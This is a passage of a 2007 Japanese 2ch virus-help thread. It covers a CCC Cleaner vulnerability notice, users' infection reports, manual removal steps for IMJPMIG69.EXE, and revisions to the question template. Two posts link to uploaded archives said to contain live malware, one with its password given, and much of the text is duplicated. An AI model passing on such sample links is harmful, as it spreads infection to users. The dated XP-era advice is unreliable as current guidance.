細工が施されたファイルの検査を実行すると、ファイルに仕込まれた悪質なプログラムを実行されたり、Windowsが不正終了したりする恐れがある。
(>>23参照)
セキュリティホールが見つかったのは、2007年1月25日から2月9日までサイバークリーンセンターで配布していたCCCクリーナー。
CCCクリーナーには、トレンドマイクロのウイルス検索エンジンを使用している。同社のウイルス検索エンジンには2月7日、「バッファオーバーフロー」と呼ばれるセキュリティホールが見つかった
そして今回、1月25日から2月9日に配布されたCCCクリーナーも、このセキュリティホールの影響を受けることが確認された。
この間にツールをダウンロードおよび実行したユーザーは、ツールの使用を中止し、ダウンロードしたツールや、ツールが作成したフォルダなどを削除する必要がある。
2月9日19時 32分以降に配布されているCCCクリーナー(バージョン253以降)では、セキュリティホールは解消されている。
バージョンの確認方法や、ツールの削除方法については、JPCERT/CCが公表している資料(PDFファイル)に詳しい。
CCCクリーナーを使った覚えがあるユーザーは、この資料を参照して対策を実施する必要がある
http://itpro.nikkeibp.co.jp/article/NEWS/20070213/261772/
セキュリティ組織のJPCERTコーディネーションセンター(JPCERT/CC)は2007年2月9日、ボット対策用ポータルサイト「サイバークリーンセンター」が配布していたボット検出・駆除ツール
「CCCクリーナー」にセキュリティホール(ぜい弱性)が見つかったことを明らかにした
細工が施されたファイルの検査を実行すると、ファイルに仕込まれた悪質なプログラムを実行されたり、Windowsが不正終了したりする恐れがある。
(>>23参照)
セキュリティホールが見つかったのは、2007年1月25日から2月9日までサイバークリーンセンターで配布していたCCCクリーナー。
CCCクリーナーには、トレンドマイクロのウイルス検索エンジンを使用している。同社のウイルス検索エンジンには2月7日、「バッファオーバーフロー」と呼ばれるセキュリティホールが見つかった
そして今回、1月25日から2月9日に配布されたCCCクリーナーも、このセキュリティホールの影響を受けることが確認された。
この間にツールをダウンロードおよび実行したユーザーは、ツールの使用を中止し、ダウンロードしたツールや、ツールが作成したフォルダなどを削除する必要がある。
2月9日19時 32分以降に配布されているCCCクリーナー(バージョン253以降)では、セキュリティホールは解消されている。
バージョンの確認方法や、ツールの削除方法については、JPCERT/CCが公表している資料(PDFファイル)に詳しい。
CCCクリーナーを使った覚えがあるユーザーは、この資料を参照して対策を実施する必要がある
911 : ◆N9P3SuvBPo :2007/02/13(火) 19:52:51
>910
おいおい…w
BOT系ウイルスに感染しているかを調べるには
ツールに頼らずに、手動によるレジストリ解析、ファイルの検索などで見つけるしか無いな。
で、確実に感染していることがわかれば、リカバリだね。
でも初心者の人には酷な作業になるから、やはりツールに頼らざるを得ないのが現状か?
おいおい…w
BOT系ウイルスに感染しているかを調べるには
ツールに頼らずに、手動によるレジストリ解析、ファイルの検索などで見つけるしか無いな。
で、確実に感染していることがわかれば、リカバリだね。
でも初心者の人には酷な作業になるから、やはりツールに頼らざるを得ないのが現状か?
912 :名無しさん@お腹いっぱい。:2007/02/13(火) 20:06:50
>>911
ispを通じてbot感染の連絡をうけてサイバークリーンセンターのツールを実行してそのままの人もいるかもしれないし
まあ一応念のため貼っときました
ところで今日のit mediaのニュースはすごいですね
「お祈りパンダ」のブリーダー、中国で逮捕
http://www.itmedia.co.jp/news/articles/0702/13/news027.html
Wordのゼロデイ脆弱性でまた新手の攻撃
http://www.itmedia.co.jp/news/articles/0702/10/news017.html
マルウェア抗争の再来? ボットネットがWarezov陣営を攻撃
http://www.itmedia.co.jp/news/articles/0702/10/news016.html
MSNワームの新種がアジアで発生
http://www.itmedia.co.jp/news/articles/0702/10/news008.html
携帯マルウェアが増加傾向、8割が感染を経験――McAfee調査
http://www.itmedia.co.jp/news/articles/0702/13/news041.html
ispを通じてbot感染の連絡をうけてサイバークリーンセンターのツールを実行してそのままの人もいるかもしれないし
まあ一応念のため貼っときました
ところで今日のit mediaのニュースはすごいですね
「お祈りパンダ」のブリーダー、中国で逮捕
http://www.itmedia.co.jp/news/articles/0702/13/news027.html
Wordのゼロデイ脆弱性でまた新手の攻撃
http://www.itmedia.co.jp/news/articles/0702/10/news017.html
マルウェア抗争の再来? ボットネットがWarezov陣営を攻撃
http://www.itmedia.co.jp/news/articles/0702/10/news016.html
MSNワームの新種がアジアで発生
http://www.itmedia.co.jp/news/articles/0702/10/news008.html
携帯マルウェアが増加傾向、8割が感染を経験――McAfee調査
http://www.itmedia.co.jp/news/articles/0702/13/news041.html
913 :名無しさん@お腹いっぱい。:2007/02/13(火) 20:55:29
914 : ◆N9P3SuvBPo :2007/02/13(火) 21:11:01
>912
なるほど、そういうことなら納得です。
しかしすごいねw>ITメディアのニュース
なるほど、そういうことなら納得です。
しかしすごいねw>ITメディアのニュース
915 :名無しさん@お腹いっぱい。:2007/02/13(火) 21:28:23
>>914
fujacksの作者が逮捕されたってのは大きいですね
WhBoyってニックネームだったんだw
fujacksはbotなどとは違ってスクリプトキディが自身のスキルを誇示する目的でつくられたような気がします
でなきゃパンダのアイコンなんかつかいませんよねw
マルウエア作者の逮捕って久しぶりに聞いた気がするんですけど
やはり情報統制されている中国ならではなのでしょうか
日本では聞いたことがありませんね
fujacksの作者が逮捕されたってのは大きいですね
WhBoyってニックネームだったんだw
fujacksはbotなどとは違ってスクリプトキディが自身のスキルを誇示する目的でつくられたような気がします
でなきゃパンダのアイコンなんかつかいませんよねw
マルウエア作者の逮捕って久しぶりに聞いた気がするんですけど
やはり情報統制されている中国ならではなのでしょうか
日本では聞いたことがありませんね
916 :名無しさん@お腹いっぱい。:2007/02/13(火) 22:14:02
917 :名無しさん@お腹いっぱい。:2007/02/14(水) 17:07:47
静かな
918 :質問:2007/02/15(木) 07:15:21
【使用OS】 windows XP
【MicrosoftUpdate】 しました。
【使用セキュリティソフト】 @nifty 常時安全セキュリティ
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】 なし
【スキャンの結果何が検出されたか JAVA_BYTEVER.AY
【どんな症状が出るか】 とくにないですが、起動してすぐにマウスが反応しません。
【症状が出る前に何をやったか】 海外のインテリアサイトみました。
【症状を解決しようとどのような処置を取ったか】 スキャンして、駆除しようとして、「駆除不可能「アクセス付加」となり駆除できません。
エクスプローラーから検索しても、出てきません。
c:\\Documents and Settings\Owner\Application Data\Sun\Java\DEployment\cache\Javapi\v1.0\jar
crtdcghcn.jar-49a4f090-2c76cc9d.zip
というところがJAVA_BYTEVER.AYに感染してます。
エクスプローラーで検索してもこのファイルは出てきません。
でも、ウィルス検査すると出てきます。
削除しようがありません。
他スレで質問したらセーフモードで起動して削除と教えていただきましたが
できませんでした。
パッチも当てると教えていただいたのですが、更新と一致してませんとなり
つかえませんでした。
どうしたら削除できますか?
【MicrosoftUpdate】 しました。
【使用セキュリティソフト】 @nifty 常時安全セキュリティ
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】 なし
【スキャンの結果何が検出されたか JAVA_BYTEVER.AY
【どんな症状が出るか】 とくにないですが、起動してすぐにマウスが反応しません。
【症状が出る前に何をやったか】 海外のインテリアサイトみました。
【症状を解決しようとどのような処置を取ったか】 スキャンして、駆除しようとして、「駆除不可能「アクセス付加」となり駆除できません。
エクスプローラーから検索しても、出てきません。
c:\\Documents and Settings\Owner\Application Data\Sun\Java\DEployment\cache\Javapi\v1.0\jar
crtdcghcn.jar-49a4f090-2c76cc9d.zip
というところがJAVA_BYTEVER.AYに感染してます。
エクスプローラーで検索してもこのファイルは出てきません。
でも、ウィルス検査すると出てきます。
削除しようがありません。
他スレで質問したらセーフモードで起動して削除と教えていただきましたが
できませんでした。
パッチも当てると教えていただいたのですが、更新と一致してませんとなり
つかえませんでした。
どうしたら削除できますか?
919 :名無しさん@お腹いっぱい。:2007/02/15(木) 12:48:25
>>917
湖畔の
湖畔の
920 :名無しさん@お腹いっぱい。:2007/02/15(木) 13:15:38
>>918
「常時安全セキュリティ24」 @nifty
ttp://www.nifty.com/sec24/aftercare.htm
Norton Internet Securityのパッケージ版のがトラブルは少ないと思う
「常時安全セキュリティ24」 @nifty
ttp://www.nifty.com/sec24/aftercare.htm
Norton Internet Securityのパッケージ版のがトラブルは少ないと思う
921 :名無しさん@お腹いっぱい。:2007/02/15(木) 16:55:58
>>918
それってzip解凍したら出てくるんでないの?
それってzip解凍したら出てくるんでないの?
922 :名無しさん@お腹いっぱい。:2007/02/15(木) 17:37:34
923 :名無しさん@お腹いっぱい。:2007/02/15(木) 17:52:06
918さん 私は違います。おかげさまで駆除できそうです。ありがとうございました
924 :名無しさん@お腹いっぱい。:2007/02/15(木) 18:10:52
http://pc9.2ch.net/test/read.cgi/jisaku/1171035125/937
↑のzipのやつ、ウィルス入りだと思うんだがバスター2006だと
検出できない。おまいら検出できる?
↑のzipのやつ、ウィルス入りだと思うんだがバスター2006だと
検出できない。おまいら検出できる?
925 :名無しさん@お腹いっぱい。:2007/02/15(木) 18:41:06
>>924
カスペその他対応済み
カスペその他対応済み
926 :名無しさん@お腹いっぱい。:2007/02/15(木) 18:46:42
927 :名無しさん@お腹いっぱい。:2007/02/15(木) 18:47:04
>>925
バスター、駄目なのか・・・orz
バスター、駄目なのか・・・orz
928 :名無しさん@お腹いっぱい。:2007/02/15(木) 18:51:25
>>919
森の
森の
929 :名無しさん@お腹いっぱい。:2007/02/15(木) 18:56:51
>>926
We found a new virus in the attachment you have sent us.
The pattern recognition will be integrated in one of our next updates.
The virus will be detected as TR/Spy.Banker.cjo
by avira
We found a new virus in the attachment you have sent us.
The pattern recognition will be integrated in one of our next updates.
The virus will be detected as TR/Spy.Banker.cjo
by avira
930 :名無しさん@お腹いっぱい。:2007/02/15(木) 19:45:25
>>928
いかがと
いかがと
931 :名無しさん@お腹いっぱい。:2007/02/15(木) 20:10:41
>>929
対応、超っぱやですね。THXです。
対応、超っぱやですね。THXです。
932 :名無しさん@お腹いっぱい。:2007/02/15(木) 20:24:45
933 :名無しさん@お腹いっぱい。:2007/02/15(木) 21:55:17
(((((((((((((((((((((((((((((((((((((((((((((((((((((
934 :名無しさん@お腹いっぱい。:2007/02/16(金) 17:08:27
windowsフォルダに削除しても再起動すると復活してるexeと
Tempフォルダにmaindll.dllってのが作られるんだけどもう放置しといていいのかな
ちょうど去年の12月31日で更新きれたノートンが反応するけど
Tempフォルダにmaindll.dllってのが作られるんだけどもう放置しといていいのかな
ちょうど去年の12月31日で更新きれたノートンが反応するけど
935 :名無しさん@お腹いっぱい。:2007/02/16(金) 17:49:41
>>934
コピーして検体送付
コピーして検体送付
936 :名無しさん@お腹いっぱい。:2007/02/16(金) 20:35:37
XPSP2 NIS2007 ルータ有 update通知後即実行
スレ違いでしたら申し訳ないのですが、
いつの間にかC:\TempEI4というフォルダがあり
その中にいくつかLOGファイルがあるのですが、これはなにかウイルス等と関係しているのでしょうか?
ググってはみたんですがこれ自体がウイルスに関係しているのかわからず…orz
スレ違いでしたら申し訳ないのですが、
いつの間にかC:\TempEI4というフォルダがあり
その中にいくつかLOGファイルがあるのですが、これはなにかウイルス等と関係しているのでしょうか?
ググってはみたんですがこれ自体がウイルスに関係しているのかわからず…orz
937 :名無しさん@お腹いっぱい。:2007/02/16(金) 21:37:47
■ウイルス警報■
また短期間の内に、約十連続でNOD32などが検出できないウイルスが出ました。
ただ今回は多数のフリー製品やKaspersky系の他に、ウイルスバスターなどの超メジャーな製品は対応できています。
NOD32などを使われている方は、検出できないウイルスが短期間で多く発見されているので、
製品の性能を過信せずにご注意して下さい。
ウイルスバスター検出名:novirus:Packed/NSPM
http://vista.jeez.jp/img/vi7154559065.jpg
http://www.virustotal.com/
参考)
>NOD32アンチウィルス Part42
>
>539 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/13(火) 18:32:43
>カスペとウイルスバスターのオンラインスキャンで、それぞれBackdoor.Win32.Agent.agv、
>BKDR_GENERICと判定された2つのファイルにNOD32が無反応なんですが、どこに報告
>すれば良いですか?
参考)
>566 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/15(木) 09:56:34
>F-Secure 6.70.13030.0 02.14.2007 Trojan-Proxy.Win32.Delf.ce
>Ikarus T3.1.0.31 02.14.2007 Email-Worm.Win32.Bagle.BR
>Kaspersky 4.0.2.24 02.15.2007 Trojan-Proxy.Win32.Delf.ce
>
>ttp://www.virustotal.com/vt/en/resultadof?ecc88a81e16a9d6f739b4f4eb430b04c
>
>567 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/15(木) 10:00:07
>またNODはヌルーですか
また短期間の内に、約十連続でNOD32などが検出できないウイルスが出ました。
ただ今回は多数のフリー製品やKaspersky系の他に、ウイルスバスターなどの超メジャーな製品は対応できています。
NOD32などを使われている方は、検出できないウイルスが短期間で多く発見されているので、
製品の性能を過信せずにご注意して下さい。
ウイルスバスター検出名:novirus:Packed/NSPM
http://vista.jeez.jp/img/vi7154559065.jpg
http://www.virustotal.com/
参考)
>NOD32アンチウィルス Part42
>
>539 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/13(火) 18:32:43
>カスペとウイルスバスターのオンラインスキャンで、それぞれBackdoor.Win32.Agent.agv、
>BKDR_GENERICと判定された2つのファイルにNOD32が無反応なんですが、どこに報告
>すれば良いですか?
参考)
>566 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/15(木) 09:56:34
>F-Secure 6.70.13030.0 02.14.2007 Trojan-Proxy.Win32.Delf.ce
>Ikarus T3.1.0.31 02.14.2007 Email-Worm.Win32.Bagle.BR
>Kaspersky 4.0.2.24 02.15.2007 Trojan-Proxy.Win32.Delf.ce
>
>ttp://www.virustotal.com/vt/en/resultadof?ecc88a81e16a9d6f739b4f4eb430b04c
>
>567 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/15(木) 10:00:07
>またNODはヌルーですか
問題が発生したため、explorer.exeを終了します。ってエラーのウィンドウが出てきて
エラーを送信しないをクリックして閉じた後に決まってノートンがbackdoor trojanを検出するんだけど
このエラーウィンドウを閉じなければ何も起こらないぽいから放置しててもいい?
常に最前面に出てるけど端っこに移動させてれば気にならないし いや気になるけど
エラーを送信しないをクリックして閉じた後に決まってノートンがbackdoor trojanを検出するんだけど
このエラーウィンドウを閉じなければ何も起こらないぽいから放置しててもいい?
常に最前面に出てるけど端っこに移動させてれば気にならないし いや気になるけど
939 :名無しさん@お腹いっぱい。:2007/02/16(金) 22:45:45
> 問題が発生したため、explorer.exeを終了します
このダイアログってめったに見ないけどなあ
windowsに復活する.exeが.dll復活させてるようなキモス
maindll.dllは↓みたいだけど
http://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FAGENT%2EGVV&VSect=Td
レジの自動起動エントリチェックするとかカスペでスキャンするとかhijackthisつかうとかすればなんかわかる鴨
http://www.geocities.jp/bruce_teller/security/leakytrojan.htm
このダイアログってめったに見ないけどなあ
windowsに復活する.exeが.dll復活させてるようなキモス
maindll.dllは↓みたいだけど
http://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FAGENT%2EGVV&VSect=Td
レジの自動起動エントリチェックするとかカスペでスキャンするとかhijackthisつかうとかすればなんかわかる鴨
http://www.geocities.jp/bruce_teller/security/leakytrojan.htm
940 :名無しさん@お腹いっぱい。:2007/02/16(金) 23:13:29
>>939
見てみたけどまったく意味がわかりません><
見てみたけどまったく意味がわかりません><
941 :名無しさん@お腹いっぱい。:2007/02/16(金) 23:39:56
942 :名無しさん@お腹いっぱい。:2007/02/16(金) 23:40:46
画面外にギリギリまで押し出してるからこんな感じ
隙あらばって感じ 常にこっち見てる
{ ! _,, -ェェュ、 |
ィ彡三ミヽ `ヽ ,ィハミミミミミミミミミヽ、|
彡'⌒ヾミヽ `ー /ililハilミilミliliミliliミミヾ|
ヾ、 /iiiiイ!ヾヾミ、ミニ=ー-ミii|
_ `ー―' i!ハ:.:.\\_::::::::::::::/:.|
彡三ミミヽ i! ヽ:.:.:.:冫': : :::/,,∠|
彡' ヾ、 _ノ i!::: ̄二ー:: : ::::ソ ・ ,|
`ー ' {ヘラ' ・_>シ;テツ"''''"|
,ィ彡三ニミヽ __ノ ヽヘ`" 彡' 〈 |
彡' ` ̄ `\ ー-=ェっ |
_ __ ノ {ミ;ヽ、 ⌒ |
,ィ彡'  ̄ ヾミミミミト-- ' |
ミ三彡' /⌒ / ̄ ̄ | : ::::::::::|
ィニニ=- ' / i `ー-(二つ
,ィ彡' { ミi (二⊃
// / l ミii ト、二)
彡' __,ノ | ミソ :..`ト-'
/ | ミ{ :.:.:..:|
ノ / ヾ\i、 :.:.:.:.:|
ィニ=-- '" / ヾヾiiヽ、 :.:.:.:.::::|
/ / `/ ̄ ̄7ハヾヾ : .:.:.|
ノ _/ / / |:. :.:.:.:.:.:.:|
隙あらばって感じ 常にこっち見てる
{ ! _,, -ェェュ、 |
ィ彡三ミヽ `ヽ ,ィハミミミミミミミミミヽ、|
彡'⌒ヾミヽ `ー /ililハilミilミliliミliliミミヾ|
ヾ、 /iiiiイ!ヾヾミ、ミニ=ー-ミii|
_ `ー―' i!ハ:.:.\\_::::::::::::::/:.|
彡三ミミヽ i! ヽ:.:.:.:冫': : :::/,,∠|
彡' ヾ、 _ノ i!::: ̄二ー:: : ::::ソ ・ ,|
`ー ' {ヘラ' ・_>シ;テツ"''''"|
,ィ彡三ニミヽ __ノ ヽヘ`" 彡' 〈 |
彡' ` ̄ `\ ー-=ェっ |
_ __ ノ {ミ;ヽ、 ⌒ |
,ィ彡'  ̄ ヾミミミミト-- ' |
ミ三彡' /⌒ / ̄ ̄ | : ::::::::::|
ィニニ=- ' / i `ー-(二つ
,ィ彡' { ミi (二⊃
// / l ミii ト、二)
彡' __,ノ | ミソ :..`ト-'
/ | ミ{ :.:.:..:|
ノ / ヾ\i、 :.:.:.:.:|
ィニ=-- '" / ヾヾiiヽ、 :.:.:.:.::::|
/ / `/ ̄ ̄7ハヾヾ : .:.:.|
ノ _/ / / |:. :.:.:.:.:.:.:|
943 : ◆N9P3SuvBPo :2007/02/16(金) 23:50:02
>1テンプレ修正版
【使用OS】 「」
【Microsoft Updateの状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
【どんな症状が出るか】 「」
【症状が出る前に何をやったか】 「」
【症状を解決しようとどのような処置を取ったか】 「」
【その他の質問】 「」
とりあえずこんなもので
っていうか、質問者は大変だろうな。
【使用OS】 「」
【Microsoft Updateの状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
【どんな症状が出るか】 「」
【症状が出る前に何をやったか】 「」
【症状を解決しようとどのような処置を取ったか】 「」
【その他の質問】 「」
とりあえずこんなもので
っていうか、質問者は大変だろうな。
944 :名無しさん@お腹いっぱい。:2007/02/17(土) 00:15:02
945 :名無しさん@お腹いっぱい。:2007/02/17(土) 00:29:23
946 : ◆N9P3SuvBPo :2007/02/17(土) 00:32:36
>944
そうですね。
自分でも多い気がしますが、これなら回答者が質問者に対して
的確なアドバイスをしやすくなると思いますので、これ位は必要かと思いました。
と言うことで、自作自演でもしてみます。
>>943
大杉w
5つに搾れw
【OS】
【対策ソフト】
【Update】
【スキャンした結果】
【症状】
…
そうですね。
自分でも多い気がしますが、これなら回答者が質問者に対して
的確なアドバイスをしやすくなると思いますので、これ位は必要かと思いました。
と言うことで、自作自演でもしてみます。
>>943
大杉w
5つに搾れw
【OS】
【対策ソフト】
【Update】
【スキャンした結果】
【症状】
…
947 :名無しさん@お腹いっぱい。:2007/02/18(日) 00:49:06
http://www8.axfc.net/uploader/15/so/N15_17125.zip.html
PASS news
このファイルの画像01が偽装jpgでexeになっています。
これは何のウィルスでしょうか……? 踏んでしまったのですが……
PASS news
このファイルの画像01が偽装jpgでexeになっています。
これは何のウィルスでしょうか……? 踏んでしまったのですが……
948 :名無しさん@お腹いっぱい。:2007/02/18(日) 00:54:22
失礼しました、テンプレに従います
【OS】 XP home edition
【対策ソフト】 ノートン アンチウィルス06
【Update】ちょっとわかりません、すいません
【スキャンした結果】検出されませんでした
【症状】特になし、ただwindowsタスクマネージャのプロセスに01.jpg.exeが大量発生。削除して再起動しても再び発生
【OS】 XP home edition
【対策ソフト】 ノートン アンチウィルス06
【Update】ちょっとわかりません、すいません
【スキャンした結果】検出されませんでした
【症状】特になし、ただwindowsタスクマネージャのプロセスに01.jpg.exeが大量発生。削除して再起動しても再び発生
949 :名無しさん@お腹いっぱい。:2007/02/18(日) 00:58:26
Win32.Delf.ce
950 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:11:17
>>947
Antinny危険
Antinny危険
当方P2Pの類には手を出していないのですが、何か具体的な被害は出ているのでしょうか……?
952 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:21:43
じゃあそのままにしとけば?
953 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:24:15
954 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:26:09
955 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:37:08
>>954
動いてたなら復活すると思うがね
動いてたなら復活すると思うがね
956 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:45:59
発生しました……orz
Connection refused (Error #10061)
というエラーが消しても消しても出てきます
Connection refused (Error #10061)
というエラーが消しても消しても出てきます
957 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:52:07
IMJPMIG69.EXEをタスクマネージャにて発見しました。削除してまいります
959 :名無しさん@お腹いっぱい。:2007/02/18(日) 02:12:07
セキュリティ初心者質問スレから
436 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/02/17(土) 05:56:19
たぶんこれだろ
エロマンガにつられてexeを実行してしまった人へ
※以下OSがXP前提の話
C:\WINDOWS\system32 に
IMJPMIG69.EXE というファイルがあったら削除
「スタート」→「ファイル名を指名して実行」→「regedit」
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に IMJPMIG69.EXE という名前があったら削除
再起動して様子見
※上記の内容がよく分からない、該当ファイルが見当たらないという場合
1.システムの復元もしくはOSの再インストール
2.回線引っこ抜いて寝る
436 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/02/17(土) 05:56:19
たぶんこれだろ
エロマンガにつられてexeを実行してしまった人へ
※以下OSがXP前提の話
C:\WINDOWS\system32 に
IMJPMIG69.EXE というファイルがあったら削除
「スタート」→「ファイル名を指名して実行」→「regedit」
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に IMJPMIG69.EXE という名前があったら削除
再起動して様子見
※上記の内容がよく分からない、該当ファイルが見当たらないという場合
1.システムの復元もしくはOSの再インストール
2.回線引っこ抜いて寝る
エロマンガにつられてexeを実行してしまった人へ
※以下OSがXP前提の話
C:\WINDOWS\system32 に
IMJPMIG69.EXE というファイルがあったら削除
「スタート」→「ファイル名を指名して実行」→「regedit」
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に IMJPMIG69.EXE という名前があったら削除
再起動して様子見
この手順を実行したところ、エラーの発生やタスクマネージャの異常もなくなったようです。
※以下OSがXP前提の話
C:\WINDOWS\system32 に
IMJPMIG69.EXE というファイルがあったら削除
「スタート」→「ファイル名を指名して実行」→「regedit」
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に IMJPMIG69.EXE という名前があったら削除
再起動して様子見
この手順を実行したところ、エラーの発生やタスクマネージャの異常もなくなったようです。
961 :名無しさん@お腹いっぱい。:2007/02/18(日) 06:37:28
IMJPMIG69か
やっぱり><←こいつがあやしい
みてたら懺悔しな
やっぱり><←こいつがあやしい
みてたら懺悔しな
962 : ◆N9P3SuvBPo :2007/02/18(日) 15:15:47
あと少しで次スレとなるわけですが、テンプレの方も次のように修正・変更しておきました。
まだ変更箇所があったら、とりあえずですが修正・変更のほどをお願いします。
まだ変更箇所があったら、とりあえずですが修正・変更のほどをお願いします。
963 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:17:16
前スレ
【ウィルス情報質問 総合スレッド★Part41】
http://pc10.2ch.net/test/read.cgi/sec/1167048038/
★質問用テンプレ★(面倒な人は次の☆質問用テンプレ(簡易版)☆を使ってください)
【使用OS】 「」
【Microsoft Updateの状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
【どんな症状が出るか】 「」
【症状が出る前に何をやったか】 「」
【症状を解決しようとどのような処置を取ったか】 「」
【その他の質問】 「」
☆質問用テンプレ(簡易版)☆
【OS】
【対策ソフト】
【Update】
【スキャンした結果】
【症状】
その他のテンプレは>>2-13あたり
【ウィルス情報質問 総合スレッド★Part41】
http://pc10.2ch.net/test/read.cgi/sec/1167048038/
★質問用テンプレ★(面倒な人は次の☆質問用テンプレ(簡易版)☆を使ってください)
【使用OS】 「」
【Microsoft Updateの状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
【どんな症状が出るか】 「」
【症状が出る前に何をやったか】 「」
【症状を解決しようとどのような処置を取ったか】 「」
【その他の質問】 「」
☆質問用テンプレ(簡易版)☆
【OS】
【対策ソフト】
【Update】
【スキャンした結果】
【症状】
その他のテンプレは>>2-13あたり
964 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:17:58
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。
最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。
■■ワクチンメーカーリンク集■■ ※ウィルス監視ソフトをワクチンソフトとも呼びます。
・トレンドマイクロ株式会社 http://www.trendmicro.co.jp/home/
製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)http://www.vintage-solutions.com/Japanese/
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
該当する場合は諦めてノートンかウィルスバスターを買いましょう。
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。
最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。
■■ワクチンメーカーリンク集■■ ※ウィルス監視ソフトをワクチンソフトとも呼びます。
・トレンドマイクロ株式会社 http://www.trendmicro.co.jp/home/
製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)http://www.vintage-solutions.com/Japanese/
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
該当する場合は諦めてノートンかウィルスバスターを買いましょう。
965 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:18:36
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
